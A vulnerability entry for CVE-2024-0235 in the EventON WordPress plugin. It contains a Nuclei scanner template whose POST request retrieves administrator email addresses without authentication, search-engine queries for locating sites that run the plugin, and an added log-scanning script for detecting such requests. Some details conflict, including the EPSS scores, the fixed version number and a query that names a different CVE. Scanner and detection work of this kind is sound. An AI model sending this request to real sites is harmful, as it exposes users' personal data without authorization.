CVSS3: 5.3 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: LOW
Integrity Impact: NONE
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

EPSS: 0.029 Low
Percentile: 90.8%

The EventON WordPress plugin before 4.5.5 and the EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve the email addresses of any users on the blog.

id: CVE-2024-0235

info:
  name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
  author: princechaddha
  severity: medium
  description: |
    The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
  impact: |
    An attacker could potentially access sensitive email information.
  remediation: |
    Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235.
  reference:
    - https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0235
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-0235
    cwe-id: CWE-862
    epss-score: 0.00052
    epss-percentile: 0.19233
    cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: myeventon
    product: eventon
    framework: wordpress
    shodan-query:
      - "vuln:CVE-2023-2796"
      - http.html:/wp-content/plugins/eventon-lite/
      - http.html:/wp-content/plugins/eventon/
    fofa-query:
      - "wp-content/plugins/eventon/"
      - body=/wp-content/plugins/eventon/
      - body=/wp-content/plugins/eventon-lite/
    publicwww-query:
      - "/wp-content/plugins/eventon/"
      - /wp-content/plugins/eventon-lite/
    google-query: "inurl:\"/wp-content/plugins/eventon/\""
  tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "_user_role=administrator"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '@'
          - 'status":"good'
          - 'value='
          - '"content":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c9b0ad3fa93a5b4f9da91f43f446ebcbfebcc8b5ff4204c82656319ba2919c62022027c3257667f4775e2b409d1e8290be69f98cff8f6eaea854344451cd25dfd327:922c64590222798bb761d5b6d8e72950
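
For site owners checking whether the endpoint in the template above has been called, the following added example (not part of the template or of the EventON project) scans web server access logs for requests to the `eventon_get_virtual_users` AJAX action. It assumes Combined Log Format; the function name, the 100-byte triage threshold and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
ACTION = "eventon_get_virtual_users"  # AJAX action named in the template above
MIN_BODY_BYTES = 100                  # assumed threshold for "a body was returned"


def find_eventon_probes(lines):
    """Return one dict per log line that calls the EventON action via the query string."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a Combined Log Format line
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/wp-admin/admin-ajax.php"):
            continue
        # parse_qs percent-decodes, so "action=eventon%5Fget_..." is still caught
        actions = parse_qs(url.query).get("action", [])
        if ACTION not in actions:
            continue
        size = 0 if m["size"] == "-" else int(m["size"])
        hits.append({
            "ip": m["ip"], "time": m["time"], "method": m["method"],
            "status": int(m["status"]), "bytes": size,
            # HTTP 200 with a non-trivial body: user data may have been returned
            "triage": m["status"] == "200" and size > MIN_BODY_BYTES,
        })
    return hits


# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "POST /wp-admin/admin-ajax.php?action=eventon_get_virtual_users HTTP/1.1" 200 1843 "-" "curl/8.4.0"',
    '203.0.113.9 - - [12/Mar/2024:10:01:05 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2024:10:02:11 +0000] "POST /blog/wp-admin/admin-ajax.php?action=eventon%5Fget_virtual_users HTTP/1.1" 403 0 "-" "curl/8.4.0"',
    '203.0.113.9 - - [12/Mar/2024:10:03:00 +0000] "GET /events/ HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_eventon_probes(SAMPLE_LOG):
        print(hit)
```

Access logs do not record POST bodies, so a request that carries `action` in the body instead of the query string will not appear here; catching those needs a WAF or application-level logging.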